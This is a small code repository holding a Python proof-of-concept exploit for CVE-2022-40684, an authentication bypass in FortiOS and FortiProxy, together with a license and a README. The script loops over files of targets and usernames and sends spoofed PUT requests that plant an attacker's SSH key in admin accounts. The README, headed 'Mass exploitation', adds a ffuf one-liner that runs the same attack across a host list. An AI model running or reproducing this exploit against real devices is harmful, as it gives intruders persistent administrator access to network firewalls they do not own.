├── CVE-2022-40684.py ├── LICENSE └── README.md /CVE-2022-40684.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import argparse 3 | 4 | # Read the input arguments 5 | parser = argparse.ArgumentParser() 6 | parser.add_argument("-t", "--targets", help="Targets file") 7 | parser.add_argument("-u", "--usernames", help="Usernames file") 8 | parser.add_argument("--key", help="id_rsa.pub file") 9 | args = parser.parse_args() 10 | 11 | # Read targets 12 | with open(args.targets, "r") as f: 13 | targets = f.read().splitlines() 14 | 15 | # Read usernames 16 | with open(args.usernames, "r") as f: 17 | usernames = f.read().splitlines() 18 | 19 | # Read id_rsa.pub 20 | with open(args.key, "r") as f: 21 | ssh_public_key = f.read() 22 | 23 | # Prepare headers 24 | headers = { 25 | 'User-Agent': 'Report Runner', 26 | 'Content-Type': 'application/json', 27 | 'Forwarded': 'for="[127.0.0.1]:8000";by="[127.0.0.1]:9000";' 28 | } 29 | 30 | # Prepare data 31 | data = { 32 | "ssh-public-key1": ssh_public_key 33 | } 34 | 35 | for target in targets: 36 | for username in usernames: 37 | url = f"{target}/api/v2/cmdb/system/admin/{username}" 38 | response = requests.put(url, headers=headers, json=data) 39 | if response.status_code == 200 and 'SSH' in response.text: 40 | print(f"[+] Successful exploit for {username} at {url}") 41 | else: 42 | print(f"[-] Failed exploit for {username} at {url}") 43 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 kljunowsky 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # CVE-2022-40684-POC 2 | FortiProxy / FortiOS Authentication bypass 3 | 4 | ## Mass exploitation 5 | 6 | ```/api/v2/cmdb/system/admin/``` 7 | 8 | 9 | ```{"ssh-public-key1": ""}``` 10 | 11 | ``` 12 | ffuf -c -w hosts.txt -u FUZZ/api/v2/cmdb/system/admin/admin -X PUT -H 'User-Agent: Report Runner' -H 'Content-Type: application/json' -H 'Forwarded: for="[127.0.0.1 13 | ]:8000";by=”[127.0.0.1]:9000";' -d '{"ssh-public-key1": "kljunowsky"}' -mr "SSH" -r 14 | ``` 15 | 16 | Happy hunting! 17 | 18 | ### Requirements 19 | [ffuf](https://github.com/ffuf/ffuf) 20 | Thanks [@joohoi](https://github.com/joohoi)! 21 | 22 | [Twitter](https://twitter.com/milanshiftsec) 23 | 24 | [LinkedIn](https://www.linkedin.com/in/milan-jovic-sec/) 25 | --------------------------------------------------------------------------------